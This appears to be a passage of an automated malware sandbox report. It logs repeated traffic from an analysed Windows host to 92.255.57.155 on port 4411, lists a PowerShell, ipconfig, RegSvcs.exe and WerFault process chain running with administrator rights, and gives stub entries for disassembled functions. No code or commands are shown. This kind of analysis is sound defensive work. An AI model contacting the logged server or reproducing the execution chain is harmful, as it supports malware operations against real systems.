Dec 29, 2024 09:50:53.850886106 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:53.970185041 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.325913906 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:54.445513964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.560615063 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:54.679924011 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.700638056 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:54.777633905 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.819960117 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.820055962 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:54.939369917 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:54.939410925 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.030677080 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.030725956 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.058765888 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.058820963 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.150155067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.178122044 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.269248962 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.275244951 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.394553900 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.394886971 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.514189959 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.522806883 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.527332067 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.605115891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.700474977 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.700544119 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:55.820030928 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.902792931 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:55.903635979 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.022985935 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.263199091 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.382430077 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.382522106 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.501882076 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.501930952 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.621269941 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.622577906 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.714701891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.741890907 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.741940022 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:56.861234903 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.925185919 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:56.925894022 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:57.045329094 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.071896076 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.072633982 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:57.178951025 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.179347038 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:57.232450962 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.235445976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:57.255964041 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.298625946 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.298726082 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:57.354747057 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:57.417990923 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:58.231785059 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:58.351149082 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:58.683506012 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:58.684333086 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:58.803694963 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:59.106870890 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:59.226265907 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:59.355346918 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:59.478255033 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:59.981864929 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:59.996072054 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:59.996114969 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:59.996217966 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.101341009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.101454020 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.220752954 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.278757095 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.398185968 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.433840990 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.435976982 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.596462965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.596529007 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.715800047 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.730443001 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.731439114 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:00.892421007 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:00.892472029 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.011733055 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.052735090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.053668976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.172944069 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.222593069 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.223505974 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.342757940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.342885971 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.383481979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.462213993 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.462274075 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.581569910 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.582303047 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.701715946 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.851191044 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:01.852299929 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:01.972635984 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.013084888 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:02.132690907 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.138015985 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:02.142200947 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.300381899 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.300447941 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:02.419754982 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.465884924 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.466845989 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:02.586657047 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.630455971 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.644798040 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:02.905721903 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:02.905836105 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.038661957 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.158076048 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.158119917 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.277492046 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.393244028 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.512567043 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.513096094 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.632411003 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.665530920 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.666430950 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.828594923 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.875638008 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.876501083 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.995868921 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:03.995994091 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:03.996284008 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.075287104 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.156414032 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.159384012 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.278810978 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.278862953 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.398222923 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.466125965 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.504595041 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.575329065 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.585464001 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.585520983 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.704919100 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.706229925 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.715167999 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.762778044 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.796051025 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.796098948 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.868629932 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.868680000 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:04.915509939 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:04.925368071 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.028398037 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.028444052 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.125988960 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.126044035 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.147810936 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.147864103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.182843924 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.183423042 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.267383099 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.271369934 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.336381912 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.448564053 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.451332092 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.570759058 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.572643042 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.575347900 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.740381956 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.743417978 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.781289101 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.781351089 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.862730980 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.862868071 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:05.900643110 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:05.905297995 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.024409056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.024480104 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:06.144088984 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.270170927 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.372179985 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:06.480650902 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.559689999 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:06.693300009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:06.872175932 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:29.367465973 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:29.419224977 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:38.504452944 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:38.623760939 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:38.623814106 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:38.743067980 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:38.955889940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:51:38.997235060 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:51:39.634541035 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 03:48:55 |
Start date: | 29/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 03:48:55 |
Start date: | 29/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:48:56 |
Start date: | 29/12/2024 |
Path: | C:\Windows\System32\ipconfig.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff698f60000 |
File size: | 35'840 bytes |
MD5 hash: | 62F170FB07FDBB79CEB7147101406EB8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 3 |
Start time: | 03:48:57 |
Start date: | 29/12/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x510000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 03:51:05 |
Start date: | 29/12/2024 |
Path: | C:\Windows\SysWOW64\WerFault.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x800000 |
File size: | 483'680 bytes |
MD5 hash: | C31336C1EFC2CCB44B4326EA793040F2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Function 00007FFD9B980FA4 Relevance: 2.0, Instructions: 1964COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B981390 Relevance: .2, Instructions: 174COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B9827E9 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8BD8D5 Relevance: .0, Instructions: 50COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B37B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B6709 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B6720 Relevance: .0, Instructions: 29COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B4C55 Relevance: .0, Instructions: 27COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B4C45 Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 15.6% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 70 |
Total number of Limit Nodes: | 15 |
Graph
Function 04D43410 Relevance: 6.7, Strings: 5, Instructions: 442COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D47948 Relevance: 3.0, Strings: 2, Instructions: 536COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D42DE8 Relevance: 3.0, Strings: 2, Instructions: 511COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40EF8 Relevance: .2, Instructions: 201COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40FAE Relevance: .2, Instructions: 186COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D406D0 Relevance: .1, Instructions: 99COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D406C0 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40963 Relevance: .1, Instructions: 89COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D44C10 Relevance: 3.2, Strings: 2, Instructions: 696COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D42428 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D428D8 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D440D0 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D402AD Relevance: 1.6, Strings: 1, Instructions: 344COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00B3EF36 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00B3E5F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D448D0 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D45AAA Relevance: 1.4, Strings: 1, Instructions: 169COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D446C0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40AF8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40B08 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D475B9 Relevance: .5, Instructions: 509COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D45DA0 Relevance: .4, Instructions: 405COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41084 Relevance: .2, Instructions: 158COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41071 Relevance: .1, Instructions: 147COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41B50 Relevance: .1, Instructions: 101COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41AED Relevance: .1, Instructions: 93COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D44AEF Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D45D90 Relevance: .1, Instructions: 83COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40006 Relevance: .1, Instructions: 82COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00ADD400 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D49477 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D40040 Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41B40 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04D41500 Relevance: .1, Instructions: 63COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
